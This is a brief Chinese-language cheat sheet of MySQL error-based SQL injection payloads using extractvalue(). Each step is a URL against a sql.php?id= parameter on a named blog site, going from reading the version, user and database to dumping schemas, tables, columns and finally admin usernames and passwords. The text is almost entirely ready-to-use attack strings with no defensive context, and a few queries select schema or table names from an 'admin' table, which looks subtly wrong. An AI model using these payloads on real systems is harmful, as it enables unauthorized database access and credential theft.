MYSQL数据库Extravtvalue报错注入
查询数据库版本信息
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))
链接用户
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select user()),0x7e))
链接数据库
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select database()),0x7e))
爆库
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM admin limit 0,1)))
爆表
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM admin limit 0,1)))
爆字段
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM admin limit 0,1)))
爆内容
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))